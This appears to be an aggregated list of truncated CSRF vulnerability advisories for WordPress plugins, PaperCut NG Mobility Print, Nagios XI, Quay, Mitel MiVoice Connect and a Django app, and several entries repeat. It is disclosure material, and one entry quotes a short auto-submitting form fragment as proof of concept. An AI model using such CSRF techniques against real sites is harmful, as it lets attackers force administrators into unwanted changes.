Order Delivery Date for WP e-Commerce <= 1.2 - Settings Update via CSRF

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack...

Make Paths Relative <= 1.3.0 - Settings Update via CSRF

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack...

Futurio Extra < 1.9.1 - Arbitrary Plugin Activation via CSRF

Description The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins perform such action via a CSRF attack...

MailMunch – Grow your Email List < 3.1.3 - Settings Update via CSRF

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack...

Remove/hide Author, Date, Category Like Entry-Meta <= 2.1 - Settings Update via CSRF

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack...

Table of Contents Plus < 2309 - Settings Update via CSRF

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack...

Optimize Database after Deleting Revisions <= 5.1 - Database Optimization via CSRF

Description The plugin does not have CSRF check when starting the database optimization process, which could allow attackers to make logged in admins perform such action via a CSRF attack...

CSRF on marking an admin task as complete

Description A data altering method is done through a get request in AdminTaskToggleDoneView, making it vulnerable to csrf attack. In django, get request is considered as a safe method and is not protected against csrf. Proof of Concept python class AdminTaskToggleDoneViewLoginRequiredMixin,...

CSRF Delete Categories

Description CSRF Delete Categories Proof of Concept 1 .Attack sends fake requests to users history.pushState'', '', '/'; document.forms0.submit; 2 .User clicks, deletes unwanted Categories Payload Poc https://drive.google.com/file/d/12cCzI-b9KLCRlND6MmjM6j-DJfTJiIt/view?usp=sharing Video Poc...

CVE-2023-2508

The PaperCutNG Mobility Print version 1.0.3512 application allows an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the clients host in the "configure printer discovery" section. This is possible because the application has no protections against CSRF...

Cross site request forgery (csrf)

The PaperCutNG Mobility Print version 1.0.3512 application allows an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the clients host in the "configure printer discovery" section. This is possible because the application has no protections against CSRF...

CVE-2023-2508 CSRF in PaperCutNG Mobility Print leads to sophisticated phishing

The PaperCutNG Mobility Print version 1.0.3512 application allows an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the clients host in the "configure printer discovery" section. This is possible because the application has no protections against CSRF...

CVE-2023-2508 CSRF in PaperCutNG Mobility Print leads to sophisticated phishing

The PaperCutNG Mobility Print version 1.0.3512 application allows an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the clients host in the "configure printer discovery" section. This is possible because the application has no protections against CSRF...

CVE-2023-2508

PaperCutNG Mobility Print 1.0.3512 is affected by a CSRF vulnerability that allows an unauthenticated attacker to make an instance administrator configure the client host via the Configure printer discovery section. The root cause is lack of CSRF protections (no Anti-CSRF tokens, header origin va...

PT-2023-7784 · Nagios · Nagios Xi

Name of the Vulnerable Software and Affected Versions: Nagios XI affected versions not specified Description: The issue is related to the lack of protection for the web page structure in the Nagios XI monitoring tool. This can be exploited by a remote attacker to perform a CSRF attack...

CVE-2023-4959

A flaw was found in Quay. Cross-site request forgery CSRF attacks force a user to perform unwanted actions in an application. During the pentest, it was detected that the config-editor page is vulnerable to CSRF. The config-editor page is used to configure the Quay instance. By coercing the...

CVE-2023-39285

A vulnerability in the Edge Gateway component of Mitel MiVoice Connect through 19.3 SP3 22.24.5800.0 could allow an unauthenticated attacker to perform a Cross Site Request Forgery CSRF attack due to insufficient request validation. A successful exploit could allow an attacker to provide a modifi...

Cross site request forgery (csrf)

A vulnerability in the Connect Mobility Router component of Mitel MiVoice Connect through 9.6.2304.102 could allow an unauthenticated attacker to perform a Cross Site Request Forgery CSRF attack due to insufficient request validation. A successful exploit could allow an attacker to provide a...

CVE-2023-39286

A vulnerability in the Connect Mobility Router component of Mitel MiVoice Connect through 9.6.2304.102 could allow an unauthenticated attacker to perform a Cross Site Request Forgery CSRF attack due to insufficient request validation. A successful exploit could allow an attacker to provide a...

CVE-2023-4318

The Herd Effects WordPress plugin before 5.2.4 does not have CSRF when deleting its items, which could allow attackers to make logged in admins delete arbitrary effects via a CSRF attack...